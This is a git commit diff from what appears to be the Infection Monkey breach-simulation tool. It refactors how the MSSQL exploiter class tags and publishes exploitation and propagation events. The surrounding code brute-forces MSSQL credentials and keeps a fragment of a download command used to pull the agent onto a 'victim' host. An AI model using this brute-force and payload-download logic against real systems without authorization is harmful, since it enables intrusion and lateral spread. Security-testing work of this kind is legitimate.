Agent: Use exploit tag properties
This commit is contained in:
parent
5c6b1e3910
commit
e404416363
|
@ -27,12 +27,6 @@ from infection_monkey.utils.threading import interruptible_iter
|
|||
logger = logging.getLogger(__name__)
|
||||
|
||||
MSSQL_EXPLOITER_TAG = "mssql-exploiter"
|
||||
EXPLOITER_TAGS = (MSSQL_EXPLOITER_TAG, T1110_ATTACK_TECHNIQUE_TAG, T1210_ATTACK_TECHNIQUE_TAG)
|
||||
PROPAGATION_TAGS = (
|
||||
MSSQL_EXPLOITER_TAG,
|
||||
T1059_ATTACK_TECHNIQUE_TAG,
|
||||
T1105_ATTACK_TECHNIQUE_TAG,
|
||||
)
|
||||
|
||||
|
||||
class MSSQLExploiter(HostExploiter):
|
||||
|
@ -50,6 +44,12 @@ class MSSQLExploiter(HostExploiter):
|
|||
"DownloadFile(^''{http_path}^'' , ^''{dst_path}^'')"
|
||||
)
|
||||
|
||||
def _exploiter_tags(self) -> Tuple[str, ...]:
|
||||
return (MSSQL_EXPLOITER_TAG, T1110_ATTACK_TECHNIQUE_TAG, T1210_ATTACK_TECHNIQUE_TAG)
|
||||
|
||||
def _propagation_tags(self) -> Tuple[str, ...]:
|
||||
return (MSSQL_EXPLOITER_TAG, T1059_ATTACK_TECHNIQUE_TAG, T1105_ATTACK_TECHNIQUE_TAG)
|
||||
|
||||
def __init__(self):
|
||||
super().__init__()
|
||||
self.cursor = None
|
||||
|
@ -71,9 +71,7 @@ class MSSQLExploiter(HostExploiter):
|
|||
f" no credentials were successful"
|
||||
)
|
||||
logger.error(error_message)
|
||||
self._publish_exploitation_event(
|
||||
self.host.ip_addr, False, EXPLOITER_TAGS, error_message
|
||||
)
|
||||
self._publish_exploitation_event(False, error_message=error_message)
|
||||
return self.exploit_result
|
||||
|
||||
if self._is_interrupted():
|
||||
|
@ -90,14 +88,12 @@ class MSSQLExploiter(HostExploiter):
|
|||
)
|
||||
|
||||
logger.error(error_message)
|
||||
self._publish_propagation_event(
|
||||
self.host.ip_addr, False, PROPAGATION_TAGS, error_message
|
||||
)
|
||||
self._publish_propagation_event(success=False, error_message=error_message)
|
||||
self.exploit_result.error_message = error_message
|
||||
|
||||
return self.exploit_result
|
||||
|
||||
self._publish_propagation_event(self.host.ip_addr, True, PROPAGATION_TAGS)
|
||||
self._publish_propagation_event(success=True)
|
||||
self.exploit_result.propagation_success = True
|
||||
return self.exploit_result
|
||||
|
||||
|
@ -144,13 +140,13 @@ class MSSQLExploiter(HostExploiter):
|
|||
)
|
||||
self.exploit_result.exploitation_success = True
|
||||
self.add_vuln_port(MSSQLExploiter.SQL_DEFAULT_TCP_PORT)
|
||||
self._report_login_attempt(True, host, user, password)
|
||||
self._report_login_attempt(True, user, password)
|
||||
cursor = conn.cursor()
|
||||
return cursor
|
||||
except pymssql.OperationalError as err:
|
||||
error_message = f"Connection to MSSQL failed: {err}"
|
||||
logger.info(error_message)
|
||||
self._report_login_attempt(False, host, user, password, error_message)
|
||||
self._report_login_attempt(False, user, password, error_message)
|
||||
# Combo didn't work, hopping to the next one
|
||||
pass
|
||||
|
||||
|
@ -162,10 +158,8 @@ class MSSQLExploiter(HostExploiter):
|
|||
"Bruteforce process failed on host: {0}".format(self.host.ip_addr)
|
||||
)
|
||||
|
||||
def _report_login_attempt(
|
||||
self, success: bool, host: str, user, password: str, message: str = ""
|
||||
):
|
||||
self._publish_exploitation_event(host, success, EXPLOITER_TAGS, error_message=message)
|
||||
def _report_login_attempt(self, success: bool, user, password: str, message: str = ""):
|
||||
self._publish_exploitation_event(success=success, error_message=message)
|
||||
self.report_login_attempt(success, user, password)
|
||||
|
||||
def _upload_agent(self, agent_path_on_victim: PureWindowsPath):
|
||||
|
|
Loading…
Reference in New Issue